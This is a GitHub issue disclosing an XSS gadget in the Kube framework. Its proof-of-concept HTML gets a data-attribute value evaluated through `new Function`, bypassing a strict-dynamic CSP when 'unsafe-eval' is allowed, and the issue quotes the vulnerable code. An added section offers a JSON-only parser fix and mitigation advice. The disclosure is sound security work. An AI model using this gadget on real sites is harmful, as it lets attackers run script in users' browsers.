This repository has been archived by the owner on Jun 24, 2022. It is now read-only.

XSS Gadget in kubeframework #144

Open
Tyaoo opened this issue Sep 11, 2021 · 0 comments

Tyaoo commented Sep 11, 2021

This XSS Gadget can invoke an arbitrary function, and you can use it to bypass the CSP containing strict-dynamic.

```html
<meta http-equiv=content-security-policy content="script-src 'nonce-random' 'unsafe-eval' 'strict-dynamic'; ">
<div data-name="{tyao:alert(1)}" data-kube="alert">xss</div>
<script nonce="random" src="kube/dist/js/kube.js"></script>
<script nonce="random">
    $K.init();
</script>
```

And the related code is below:

```js
data: function(name, value)
{
    if (name === undefined)
    {
        var reDataAttr = /^data\-(.+)$/;
        var attrs = this.get().attributes;

        var data = {};
        var replacer = function (g) { return g[1].toUpperCase(); };

        for (var key in attrs)
        {
            if (attrs[key] && reDataAttr.test(attrs[key].nodeName))
            {
                var dataName = attrs[key].nodeName.match(reDataAttr)[1];
                var val = attrs[key].value; // read the attribute 'data-*'
                dataName = dataName.replace(/-([a-z])/g, replacer);

                if (this._isObjectString(val)) val = this._toObject(val);
                else val = (this._isNumber(val)) ? parseFloat(val) : this._getBooleanFromStr(val);

                data[dataName] = val;
            }
        }

        return data;
    }

    return this.attr(name, value, true);
}


_isObjectString: function(str)
{
    return (str.search(/^{/) !== -1); // true when the string starts with `{`
}

_toObject: function(str)
{
    return (new Function("return " + str))(); // create a new function
}
```
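Added example, not part of the original issue or of the Kube code base: a data-only replacement for `_toObject`, run beside the original on the payload shape from the report. The names `safeToObject`, `parseDataValue`, `compare` and `sentinel` are hypothetical, and the number/boolean handling only approximates Kube's `_isNumber` and `_getBooleanFromStr`.

```javascript
// Hardened stand-in for _toObject: data only, nothing is ever evaluated.
function safeToObject(str) {
    try {
        return JSON.parse(str); // strict JSON first
    } catch (e) { /* fall through to the relaxed form */ }

    // Relaxed form: quote bare identifier keys ({width: 200} -> {"width": 200})
    // and retry. Values must still be JSON literals, so a call expression
    // stays a parse error instead of being executed.
    var quoted = str.replace(/([{,]\s*)([A-Za-z_$][\w$]*)\s*:/g, '$1"$2":');
    try {
        return JSON.parse(quoted);
    } catch (e) {
        return str; // unparseable: hand back the inert string
    }
}

// Same branching as the data() loop quoted in the issue, with the safe parser
// swapped in (number and boolean checks are assumptions, not Kube's helpers).
function parseDataValue(val) {
    if (/^{/.test(val)) return safeToObject(val);
    if (/^-?\d+(\.\d+)?$/.test(val)) return parseFloat(val);
    if (val === 'true') return true;
    if (val === 'false') return false;
    return val;
}

// Original behaviour from the issue, kept only for comparison.
function vulnerableToObject(str) {
    return (new Function("return " + str))();
}

// Constructed sentinel standing in for alert(); counts how often it runs.
globalThis.sentinelCalls = 0;
globalThis.sentinel = function () { globalThis.sentinelCalls += 1; };

// Feed one attribute value to both parsers and report what executed.
function compare(attrValue) {
    globalThis.sentinelCalls = 0;
    vulnerableToObject(attrValue);
    var callsVulnerable = globalThis.sentinelCalls;

    globalThis.sentinelCalls = 0;
    var parsed = parseDataValue(attrValue);
    return { callsVulnerable: callsVulnerable, callsSafe: globalThis.sentinelCalls, parsed: parsed };
}
```

Because the `Function` constructor is gated by `'unsafe-eval'`, removing that keyword from the `script-src` shown in the report also stops `_toObject` from running attribute content.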